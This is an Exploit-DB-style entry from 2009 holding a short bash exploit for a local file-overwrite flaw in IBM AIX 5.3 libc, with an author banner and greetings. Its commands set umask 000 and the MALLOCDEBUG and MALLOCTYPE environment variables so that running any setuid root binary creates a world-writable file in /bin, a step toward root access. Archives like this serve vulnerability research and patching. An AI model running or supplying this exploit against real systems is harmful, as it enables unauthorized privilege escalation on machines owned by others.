IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite

EDB-ID:

9306

CVE:

N/A

Author:

Affix

Type:

local

Platform:

AIX

Published:

2009-07-30

#!/bin/bash
#################################################################
#		      _______ _________ _       						#
#		     (  ____ )\__   __/( (    /|						#
#		     | (    )|   ) (   |  \  ( |						#
#		     | (____)|   | |   |   \ | |						#
#		     |     __)   | |   | (\ \) |						#
#		     | (\ (      | |   | | \   |						#
#		     | ) \ \__   | |   | )  \  |						#
#		     |/   \__/   )_(   |/    )_)						#
#                        http://root-the.net 					#
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability		#
#[+] Refer : securitytracker.com/id?1022261                     #
#[+] Exploit : Affix <root@root-the.net>						#
#[+] Tested on : IBM AIX										#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull	#
# AIX 5.3 ML 5 is where this bad libc code was added.			#
# Libs Affected :												#
#	/usr/ccs/lib/libc.a											#
#	/usr/ccs/lib/libp/libc.a									#
#################################################################

Set the following environment variables:

umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."

# milw0rm.com [2009-07-30]